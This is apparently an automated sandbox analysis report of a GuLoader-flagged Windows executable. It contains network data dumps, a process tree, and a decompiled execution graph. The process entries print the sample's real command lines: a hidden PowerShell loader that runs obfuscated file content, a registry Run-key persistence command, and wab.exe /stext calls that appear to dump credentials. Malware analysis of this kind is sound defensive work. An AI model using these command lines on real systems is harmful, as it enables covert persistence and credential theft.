                                                          2024-04-24 05:13:13 UTC1369INData Raw: 13 60 94 4c 7c 27 9c 54 09 b6 0a b8 70 73 52 5c 92 ac a7 a6 4b da 98 9e 98 a4 96 ef e8 69 7d dc 95 ca de cb 26 20 b5 02 0b bb 29 41 a4 3f 39 12 9f d5 c0 14 f1 13 da b8 d1 1c a1 67 ef 37 a0 77 86 1e 0f 89 53 7b 3d 7d 5b 9a 73 2e 1f 17 74 4c d7 f0 a4 97 c0 a3 79 fa bf e3 bd ab f0 47 ea 92 7a 54 de 48 78 3f 17 4b cc 4e bc ea f3 79 e9 55 72 48 8f d7 e4 5d 13 8c 0d 8a 13 ef 99 b4 d1 4f d3 1d 78 82 99 d0 41 3f d3 71 d8 86 e2 54 84 24 c6 99 c6 c0 90 d7 dc 02 c6 6b 5a 40 c6 6c 64 6b d7 04 91 cd a1 bf 68 3d d4 6e 26 1f bb 39 cf 14 2d 10 fc 93 17 d1 fe ac d6 9e c0 03 e6 53 f8 f9 97 64 d6 11 ab 62 0a cd 87 cf 1d f5 0d f6 eb 61 d7 ab 49 7e 24 52 9d df b3 29 e6 3a 74 92 16 a8 12 87 b5 f4 12 3f a0 82 4f 3b c5 36 ac 1b 58 b2 1f fc 7a cd ae 0e be 34 71 88 c2 eb 5d 79 e8
                                                          Data Ascii: `L|'TpsR\Ki}& )A?9g7wS{=}[s.tLyGzTHx?KNyUrH]OxA?qT$kZ@ldkh=n&9-SdbaI~$R):t?O;6Xz4q]y
                                                          2024-04-24 05:13:13 UTC1369INData Raw: 7a 81 02 b7 3f e3 cd 35 3d 1c bd b3 b4 c6 06 76 79 5e 9e f4 b0 2e 7b d5 ae d9 dc c7 e7 e5 03 4f 92 a3 5d 8a 6d 8f 1f e0 75 2a 8b 1c bb d4 fc df 40 85 b1 35 31 78 1a 27 4a b3 ee 38 4f 5b 10 72 f8 49 b7 49 b8 9b 4b b4 f9 a9 a3 d3 57 b5 4e 34 51 89 21 67 64 35 a3 52 cc 5b 84 01 b5 69 16 4c 9e 8a 9a 8b a2 0a 96 da 0b 0d c6 07 f8 5d 37 2d 75 b1 da a3 ca 21 1c 79 f8 38 5c 15 d2 90 df 34 20 5e 88 0b 3e cd 38 4b 2e 1f 73 c5 78 59 80 ee a6 fe 31 e4 a7 2e 2f ca 44 c4 6a 21 8f c7 8a 94 ed 5a fc f7 9a ff 6e d3 46 a6 87 6f 1e 83 09 b8 a9 bd 77 a5 23 b3 0a e5 14 ca 1c 07 ef b3 05 00 40 ca 1e 48 97 e8 3d f2 6e 88 65 63 de 9c 8b 81 ca 5e f8 b9 f5 16 0d 36 7a 93 04 c4 86 e0 43 d2 bb 1e 50 52 66 8f a0 83 2b 90 2c 9a 04 04 cd 72 60 24 98 28 76 68 34 3f 11 6d f9 58 72 c0 00
                                                          Data Ascii: z?5=vy^.{O]mu*@51x'J8O[rIIKWN4Q!gd5R[iL]7-u!y8\4 ^>8K.sxY1./Dj!ZnFow#@H=nec^6zCPRf+,r`$(vh4?mXr
                                                          2024-04-24 05:13:13 UTC1369INData Raw: 9f 54 cf c5 31 c4 dc cf 39 59 f5 0a 7a 24 bd c7 19 bb 3a 94 e9 b7 b8 94 f5 ec 13 e2 0d e3 3e 17 35 77 73 ae 4a 3b 81 05 6c 59 e7 74 48 73 ed 75 14 d5 71 43 3d ad 02 41 9d b6 e6 ae 1b 0f b8 f7 6e 7b 7a ee f2 86 bf f4 a8 14 2e 9d c5 8b 86 50 57 d7 5d 95 04 65 58 1a 55 b5 95 9f 64 49 0b 3f de 0e 8a e7 fb ee f8 d2 8b 99 0f 60 2e fe 1a a7 e5 10 45 3f 63 42 da 4e 76 f1 69 69 51 52 2d bb b1 85 ae 73 43 4b 27 82 db 45 cf 95 50 99 54 60 7f d0 65 56 4f a1 d4 ae b4 a4 dd 7f 32 db 1a ba e8 4d ff 6a a9 52 f2 d4 b4 00 77 e2 6b 5d 89 6f 34 5a df c2 d3 53 c7 04 9a a2 18 92 57 b6 b3 eb f3 40 e4 b0 27 ae 3e 5d 4f e6 8a 31 b8 e3 3a 40 ab e6 83 4a f8 63 bd 1f 02 1f ae 33 aa 24 ff e2 55 7b be e5 a5 10 22 51 12 03 13 28 14 8a a1 f4 6a 3f bd db ca 9d 91 b4 7f 8e a1 be 7a 48 e5
                                                          Data Ascii: T19Yz$:>5wsJ;lYtHsuqC=An{z.PW]eXUdI?`.E?cBNviiQR-sCK'EPT`eVO2MjRwk]o4ZSW@'>]O1:@Jc3$U{"Q(j?zH
                                                          2024-04-24 05:13:13 UTC1369INData Raw: 74 70 e8 91 97 b9 79 77 67 a8 80 90 61 49 b5 35 f9 2e d8 33 80 26 92 cc 2e 15 c1 7c 81 3c ca 55 5f cd b3 60 de 9e ce 50 af f8 e3 15 be 12 2d 0a 90 af 97 84 8d 52 e1 a3 47 fc 3b 44 21 01 c4 3b b7 ca bb e4 c1 a0 54 a2 1c b7 35 d4 bf ad 2a 70 ed 48 4c 94 4c 9c 42 ee b2 35 cd a4 78 ab 7c 83 77 29 06 95 12 86 c6 36 f5 b3 8f c9 cd 3d 42 4c af 7a 61 cd b2 0f c3 5d 46 ea e9 31 c9 85 cb 7a a3 8e f5 1f e2 aa 27 7c 31 90 1c 37 6a 4e f8 6b fc ee 37 11 cc 5c 6e 0f 74 43 82 e8 59 34 ff fb 73 6c 6c 5a 79 12 f6 7f 20 7e 42 6c 9e 40 05 86 c5 39 a7 8e 6f 4d 10 c2 67 60 44 d8 12 55 f3 fb e8 66 76 e0 fe 4b 94 78 cb 2c f3 75 d0 6d b2 f0 34 6b ae df f4 c9 ab 5e 78 76 b3 78 64 c8 3c 98 6f ac 3e 06 85 03 9e e0 33 61 ee 69 09 8e bb 3f 0b dd 0d e2 69 b4 6e ba c5 a9 3e 5d 0b bd 69
                                                          Data Ascii: tpywgaI5.3&.|<U_`P-RG;D!;T5*pHLLB5x|w)6=BLza]F1z'|17jNk7\ntCY4sllZy ~Bl@9oMg`DUfvKx,um4k^xvxd<o>3ai?in>]i
                                                          2024-04-24 05:13:13 UTC1369INData Raw: 5e f4 57 bc 16 12 97 ef 42 36 79 5a 6f b4 2f 4b d4 71 83 13 62 d5 c0 4a 69 90 c5 7b 82 c7 d0 62 3c 9a 80 85 12 79 a5 06 56 af 99 39 3f e0 e3 85 d1 d9 19 48 cb ca 8c ae 80 e2 e8 05 f8 32 a5 4f 31 d4 a6 df 13 b4 45 c3 d4 29 10 bb 7b 4d 9f da a8 45 58 6c be 24 bf 74 4b 7c 9b 78 bd 14 b3 86 a8 77 fa 44 33 06 d2 64 84 3e f5 4f 7e cd f3 8a d6 4e 7f b1 35 c8 c2 20 a0 86 2c 5d 4b 6a 0e b7 88 83 bf 05 c9 87 0c 45 87 07 14 7e a8 9f 19 fc ce fa 46 90 14 3a ac 5a a4 fc 77 3b b6 7c 09 44 b8 56 20 1a e6 99 38 a2 ba 8e 32 f7 cc dc e2 35 f8 35 e4 1c 51 e1 eb 33 10 63 22 4e 8a cc 47 83 b4 d6 f9 f4 0c b8 13 15 19 6b a6 25 ea 44 08 38 2a 81 ad a5 98 9a a1 a8 87 ed c8 62 3a de 91 c3 0e 37 48 27 34 6e 00 63 ac 65 ac bd ae de df 07 8f f3 ea 33 22 6f dd ef 03 49 15 3d cf 28 c7
                                                          Data Ascii: ^WB6yZo/KqbJi{b<yV9?H2O1E){MEXl$tK|xwD3d>O~N5 ,]KjE~F:Zw;|DV 8255Q3c"NGk%D8*b:7H'4nce3"oI=(
                                                          2024-04-24 05:13:13 UTC1369INData Raw: 79 f4 f2 73 85 62 f6 43 1c 16 39 a1 ac dd 34 22 f2 6b 38 0e ba 05 92 01 23 c4 b5 18 e2 4a 67 68 4b 2f 9d fb 46 87 2f 93 c1 7d e8 ae c6 07 8f f1 55 8a 97 51 d5 d7 ff fb b5 30 1f e5 ec 21 53 79 f3 49 9d 02 3f c9 45 eb 23 15 fa e1 7e 05 06 ba e7 14 65 77 4c 16 58 fa 60 b1 ca 17 6c 02 44 55 0b e7 62 99 d4 71 46 8b 81 04 bb 07 46 fc ae 50 03 86 9e 78 ff 09 af 81 0c 50 d1 6e ed c9 2d 8b 2c f9 26 85 a5 eb fb cd 74 60 24 74 d7 89 f9 e4 b5 1c d0 28 b7 f1 bd f3 b0 e1 0a 0a b1 d4 55 30 00 61 9d 48 06 2d 76 52 7e 3f 34 c4 c4 da de c2 8f d8 38 18 50 72 62 4d c6 47 80 ee 8d a1 e7 b4 99 f4 79 b8 d1 a5 eb 33 1f 86 09 0a fe 63 90 88 3a 6d 20 b2 cc 60 42 2e 34 47 04 2c 11 ec ba 9c 91 f2 3e 61 c0 fa 60 88 96 00 fd 98 12 61 35 01 a8 dc b0 70 87 fb 0a aa e5 10 2a 7b 1e 9f 58
                                                          Data Ascii: ysbC94"k8#JghK/F/}UQ0!SyI?E#~ewLX`lDUbqFFPxPn-,&t`$t(U0aH-vR~?48PrbMGy3c:m `B.4G,>a`a5p*{X


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:07:12:40
                                                          Start date:24/04/2024
                                                          Path:C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"
                                                          Imagebase:0x400000
                                                          File size:1'011'136 bytes
                                                          MD5 hash:189590B2755ED6F134D8FE2C05124926
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:07:12:43
                                                          Start date:24/04/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)"
                                                          Imagebase:0x7d0000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1656034201.00000000093F7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:07:12:43
                                                          Start date:24/04/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:07:12:44
                                                          Start date:24/04/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                          Imagebase:0xc50000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:07:13:06
                                                          Start date:24/04/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                          Imagebase:0xc80000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:9
                                                          Start time:07:13:10
                                                          Start date:24/04/2024
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"
                                                          Imagebase:0xc50000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:07:13:10
                                                          Start date:24/04/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:07:13:10
                                                          Start date:24/04/2024
                                                          Path:C:\Windows\SysWOW64\reg.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"
                                                          Imagebase:0x640000
                                                          File size:59'392 bytes
                                                          MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:07:13:21
                                                          Start date:24/04/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"
                                                          Imagebase:0xc80000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:07:13:21
                                                          Start date:24/04/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"
                                                          Imagebase:0xc80000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:07:13:21
                                                          Start date:24/04/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\itedxngwlibzmqlvhhlsguxrsq"
                                                          Imagebase:0xc80000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:07:13:21
                                                          Start date:24/04/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"
                                                          Imagebase:0xc80000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:07:13:21
                                                          Start date:24/04/2024
                                                          Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"
                                                          Imagebase:0xc80000
                                                          File size:516'608 bytes
                                                          MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:26.9%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:21%
                                                            Total number of Nodes:1316
                                                            Total number of Limit Nodes:39
                                                            execution_graph 3702 402840 3703 402bbf 18 API calls 3702->3703 3705 40284e 3703->3705 3704 402864 3707 405c00 2 API calls 3704->3707 3705->3704 3706 402bbf 18 API calls 3705->3706 3706->3704 3708 40286a 3707->3708 3730 405c25 GetFileAttributesW CreateFileW 3708->3730 3710 402877 3711 402883 GlobalAlloc 3710->3711 3712 40291a 3710->3712 3715 402911 CloseHandle 3711->3715 3716 40289c 3711->3716 3713 402922 DeleteFileW 3712->3713 3714 402935 3712->3714 3713->3714 3715->3712 3731 403258 SetFilePointer 3716->3731 3718 4028a2 3719 403242 ReadFile 3718->3719 3720 4028ab GlobalAlloc 3719->3720 3721 4028bb 3720->3721 3722 4028ef 3720->3722 3723 403027 32 API calls 3721->3723 3724 405cd7 WriteFile 3722->3724 3728 4028c8 3723->3728 3725 4028fb GlobalFree 3724->3725 3726 403027 32 API calls 3725->3726 3729 40290e 3726->3729 3727 4028e6 GlobalFree 3727->3722 3728->3727 3729->3715 3730->3710 3731->3718 3732 401cc0 3733 402ba2 18 API calls 3732->3733 3734 401cc7 3733->3734 3735 402ba2 18 API calls 3734->3735 3736 401ccf GetDlgItem 3735->3736 3737 402531 3736->3737 3738 4029c0 3739 402ba2 18 API calls 3738->3739 3740 4029c6 3739->3740 3741 4029d4 3740->3741 3742 4029f9 3740->3742 3744 40281e 3740->3744 3741->3744 3746 405f97 wsprintfW 3741->3746 3743 406072 18 API calls 3742->3743 3742->3744 3743->3744 3746->3744 3235 401fc3 3236 401fd5 3235->3236 3237 402087 3235->3237 3255 402bbf 3236->3255 3239 401423 25 API calls 3237->3239 3246 4021e1 3239->3246 3241 402bbf 18 API calls 3242 401fe5 3241->3242 3243 401ffb LoadLibraryExW 3242->3243 3244 401fed GetModuleHandleW 3242->3244 3243->3237 3245 40200c 3243->3245 3244->3243 3244->3245 3261 406499 WideCharToMultiByte 3245->3261 3249 402056 3251 4051af 25 API calls 3249->3251 3250 40201d 3253 40202d 3250->3253 3264 401423 3250->3264 3251->3253 3253->3246 3254 402079 FreeLibrary 3253->3254 3254->3246 3256 402bcb 3255->3256 3257 406072 18 API calls 3256->3257 3258 402bec 3257->3258 3259 401fdc 3258->3259 3260 4062e4 5 API calls 3258->3260 3259->3241 3260->3259 3262 4064c3 GetProcAddress 3261->3262 3263 402017 3261->3263 3262->3263 3263->3249 3263->3250 3265 4051af 25 API calls 3264->3265 3266 401431 3265->3266 3266->3253 3747 4016c4 3748 402bbf 18 API calls 3747->3748 3749 4016ca GetFullPathNameW 3748->3749 3750 4016e4 3749->3750 3751 401706 3749->3751 3750->3751 3754 406393 2 API calls 3750->3754 3752 40171b GetShortPathNameW 3751->3752 3753 402a4c 3751->3753 3752->3753 3755 4016f6 3754->3755 3755->3751 3757 406050 lstrcpynW 3755->3757 3757->3751 3758 4014cb 3759 4051af 25 API calls 3758->3759 3760 4014d2 3759->3760 3761 40194e 3762 402bbf 18 API calls 3761->3762 3763 401955 lstrlenW 3762->3763 3764 402531 3763->3764 3765 4027ce 3766 4027d6 3765->3766 3767 4027da FindNextFileW 3766->3767 3769 4027ec 3766->3769 3768 402833 3767->3768 3767->3769 3771 406050 lstrcpynW 3768->3771 3771->3769 3431 401754 3432 402bbf 18 API calls 3431->3432 3433 40175b 3432->3433 3434 405c54 2 API calls 3433->3434 3435 401762 3434->3435 3436 405c54 2 API calls 3435->3436 3436->3435 3772 401d56 GetDC GetDeviceCaps 3773 402ba2 18 API calls 3772->3773 3774 401d74 MulDiv ReleaseDC 3773->3774 3775 402ba2 18 API calls 3774->3775 3776 401d93 3775->3776 3777 406072 18 API calls 3776->3777 3778 401dcc CreateFontIndirectW 3777->3778 3779 402531 3778->3779 3437 4014d7 3442 402ba2 3437->3442 3439 4014dd Sleep 3441 402a4c 3439->3441 3443 406072 18 API calls 3442->3443 3444 402bb6 3443->3444 3444->3439 3780 401a57 3781 402ba2 18 API calls 3780->3781 3782 401a5d 3781->3782 3783 402ba2 18 API calls 3782->3783 3784 401a05 3783->3784 3785 403857 3786 403862 3785->3786 3787 403866 3786->3787 3788 403869 GlobalAlloc 3786->3788 3788->3787 3789 40155b 3790 4029f2 3789->3790 3793 405f97 wsprintfW 3790->3793 3792 4029f7 3793->3792 3538 401ddc 3539 402ba2 18 API calls 3538->3539 3540 401de2 3539->3540 3541 402ba2 18 API calls 3540->3541 3542 401deb 3541->3542 3543 401df2 ShowWindow 3542->3543 3544 401dfd EnableWindow 3542->3544 3545 402a4c 3543->3545 3544->3545 3639 401bdf 3640 402ba2 18 API calls 3639->3640 3641 401be6 3640->3641 3642 402ba2 18 API calls 3641->3642 3643 401bf0 3642->3643 3644 401c00 3643->3644 3646 402bbf 18 API calls 3643->3646 3645 401c10 3644->3645 3647 402bbf 18 API calls 3644->3647 3648 401c1b 3645->3648 3649 401c5f 3645->3649 3646->3644 3647->3645 3650 402ba2 18 API calls 3648->3650 3651 402bbf 18 API calls 3649->3651 3652 401c20 3650->3652 3653 401c64 3651->3653 3654 402ba2 18 API calls 3652->3654 3655 402bbf 18 API calls 3653->3655 3657 401c29 3654->3657 3656 401c6d FindWindowExW 3655->3656 3660 401c8f 3656->3660 3658 401c31 SendMessageTimeoutW 3657->3658 3659 401c4f SendMessageW 3657->3659 3658->3660 3659->3660 3661 4022df 3662 402bbf 18 API calls 3661->3662 3663 4022ee 3662->3663 3664 402bbf 18 API calls 3663->3664 3665 4022f7 3664->3665 3666 402bbf 18 API calls 3665->3666 3667 402301 GetPrivateProfileStringW 3666->3667 3794 401960 3795 402ba2 18 API calls 3794->3795 3796 401967 3795->3796 3797 402ba2 18 API calls 3796->3797 3798 401971 3797->3798 3799 402bbf 18 API calls 3798->3799 3800 40197a 3799->3800 3801 40198e lstrlenW 3800->3801 3803 4019ca 3800->3803 3802 401998 3801->3802 3802->3803 3807 406050 lstrcpynW 3802->3807 3805 4019b3 3805->3803 3806 4019c0 lstrlenW 3805->3806 3806->3803 3807->3805 3808 404262 lstrlenW 3809 404281 3808->3809 3810 404283 WideCharToMultiByte 3808->3810 3809->3810 3811 401662 3812 402bbf 18 API calls 3811->3812 3813 401668 3812->3813 3814 406393 2 API calls 3813->3814 3815 40166e 3814->3815 3816 4019e4 3817 402bbf 18 API calls 3816->3817 3818 4019eb 3817->3818 3819 402bbf 18 API calls 3818->3819 3820 4019f4 3819->3820 3821 4019fb lstrcmpiW 3820->3821 3822 401a0d lstrcmpW 3820->3822 3823 401a01 3821->3823 3822->3823 3824 4025e5 3825 402ba2 18 API calls 3824->3825 3834 4025f4 3825->3834 3826 40272d 3827 40263a ReadFile 3827->3826 3827->3834 3828 405ca8 ReadFile 3828->3834 3830 40267a MultiByteToWideChar 3830->3834 3831 40272f 3846 405f97 wsprintfW 3831->3846 3833 4026a0 SetFilePointer MultiByteToWideChar 3833->3834 3834->3826 3834->3827 3834->3828 3834->3830 3834->3831 3834->3833 3835 402740 3834->3835 3837 405d06 SetFilePointer 3834->3837 3835->3826 3836 402761 SetFilePointer 3835->3836 3836->3826 3838 405d22 3837->3838 3843 405d3e 3837->3843 3839 405ca8 ReadFile 3838->3839 3840 405d2e 3839->3840 3841 405d47 SetFilePointer 3840->3841 3842 405d6f SetFilePointer 3840->3842 3840->3843 3841->3842 3844 405d52 3841->3844 3842->3843 3843->3834 3845 405cd7 WriteFile 3844->3845 3845->3843 3846->3826 3267 401e66 3268 402bbf 18 API calls 3267->3268 3269 401e6c 3268->3269 3270 4051af 25 API calls 3269->3270 3271 401e76 3270->3271 3272 405730 2 API calls 3271->3272 3273 401e7c 3272->3273 3274 40281e 3273->3274 3275 401edb CloseHandle 3273->3275 3276 401e8c WaitForSingleObject 3273->3276 3275->3274 3278 401e9e 3276->3278 3277 401eb0 GetExitCodeProcess 3280 401ec2 3277->3280 3281 401ecf 3277->3281 3278->3277 3279 406466 2 API calls 3278->3279 3284 401ea5 WaitForSingleObject 3279->3284 3285 405f97 wsprintfW 3280->3285 3281->3275 3283 401ecd 3281->3283 3283->3275 3284->3278 3285->3283 3286 401767 3287 402bbf 18 API calls 3286->3287 3288 40176e 3287->3288 3289 401796 3288->3289 3290 40178e 3288->3290 3326 406050 lstrcpynW 3289->3326 3325 406050 lstrcpynW 3290->3325 3293 401794 3297 4062e4 5 API calls 3293->3297 3294 4017a1 3295 405a04 3 API calls 3294->3295 3296 4017a7 lstrcatW 3295->3296 3296->3293 3307 4017b3 3297->3307 3298 406393 2 API calls 3298->3307 3301 4017c5 CompareFileTime 3301->3307 3302 401885 3303 4051af 25 API calls 3302->3303 3305 40188f 3303->3305 3304 4051af 25 API calls 3306 401871 3304->3306 3308 403027 32 API calls 3305->3308 3307->3298 3307->3301 3307->3302 3312 406072 18 API calls 3307->3312 3316 406050 lstrcpynW 3307->3316 3321 405795 MessageBoxIndirectW 3307->3321 3322 40185c 3307->3322 3324 405c25 GetFileAttributesW CreateFileW 3307->3324 3327 405c00 GetFileAttributesW 3307->3327 3309 4018a2 3308->3309 3310 4018b6 SetFileTime 3309->3310 3311 4018c8 FindCloseChangeNotification 3309->3311 3310->3311 3311->3306 3313 4018d9 3311->3313 3312->3307 3314 4018f1 3313->3314 3315 4018de 3313->3315 3318 406072 18 API calls 3314->3318 3317 406072 18 API calls 3315->3317 3316->3307 3319 4018e6 lstrcatW 3317->3319 3320 4018f9 3318->3320 3319->3320 3323 405795 MessageBoxIndirectW 3320->3323 3321->3307 3322->3304 3322->3306 3323->3306 3324->3307 3325->3293 3326->3294 3328 405c12 SetFileAttributesW 3327->3328 3329 405c1f 3327->3329 3328->3329 3329->3307 3847 404568 3848 404578 3847->3848 3849 40459e 3847->3849 3851 404114 19 API calls 3848->3851 3850 40417b 8 API calls 3849->3850 3852 4045aa 3850->3852 3853 404585 SetDlgItemTextW 3851->3853 3853->3849 3854 401ee9 3855 402bbf 18 API calls 3854->3855 3856 401ef0 3855->3856 3857 406393 2 API calls 3856->3857 3858 401ef6 3857->3858 3860 401f07 3858->3860 3861 405f97 wsprintfW 3858->3861 3861->3860 3862 4021ea 3863 402bbf 18 API calls 3862->3863 3864 4021f0 3863->3864 3865 402bbf 18 API calls 3864->3865 3866 4021f9 3865->3866 3867 402bbf 18 API calls 3866->3867 3868 402202 3867->3868 3869 406393 2 API calls 3868->3869 3870 40220b 3869->3870 3871 40221c lstrlenW lstrlenW 3870->3871 3872 40220f 3870->3872 3874 4051af 25 API calls 3871->3874 3873 4051af 25 API calls 3872->3873 3875 402217 3872->3875 3873->3875 3876 40225a SHFileOperationW 3874->3876 3876->3872 3876->3875 3877 40156b 3878 401584 3877->3878 3879 40157b ShowWindow 3877->3879 3880 401592 ShowWindow 3878->3880 3881 402a4c 3878->3881 3879->3878 3880->3881 3362 4052ee 3363 405498 3362->3363 3364 40530f GetDlgItem GetDlgItem GetDlgItem 3362->3364 3366 4054a1 GetDlgItem CreateThread FindCloseChangeNotification 3363->3366 3367 4054c9 3363->3367 3407 404149 SendMessageW 3364->3407 3366->3367 3430 405282 5 API calls 3366->3430 3369 4054e0 ShowWindow ShowWindow 3367->3369 3370 405519 3367->3370 3371 4054f4 3367->3371 3368 40537f 3373 405386 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3368->3373 3412 404149 SendMessageW 3369->3412 3416 40417b 3370->3416 3372 405554 3371->3372 3375 405508 3371->3375 3376 40552e ShowWindow 3371->3376 3372->3370 3382 405562 SendMessageW 3372->3382 3380 4053f4 3373->3380 3381 4053d8 SendMessageW SendMessageW 3373->3381 3413 4040ed 3375->3413 3378 405540 3376->3378 3379 40554e 3376->3379 3385 4051af 25 API calls 3378->3385 3386 4040ed SendMessageW 3379->3386 3387 405407 3380->3387 3388 4053f9 SendMessageW 3380->3388 3381->3380 3384 405527 3382->3384 3389 40557b CreatePopupMenu 3382->3389 3385->3379 3386->3372 3408 404114 3387->3408 3388->3387 3390 406072 18 API calls 3389->3390 3392 40558b AppendMenuW 3390->3392 3394 4055a8 GetWindowRect 3392->3394 3395 4055bb TrackPopupMenu 3392->3395 3393 405417 3396 405420 ShowWindow 3393->3396 3397 405454 GetDlgItem SendMessageW 3393->3397 3394->3395 3395->3384 3399 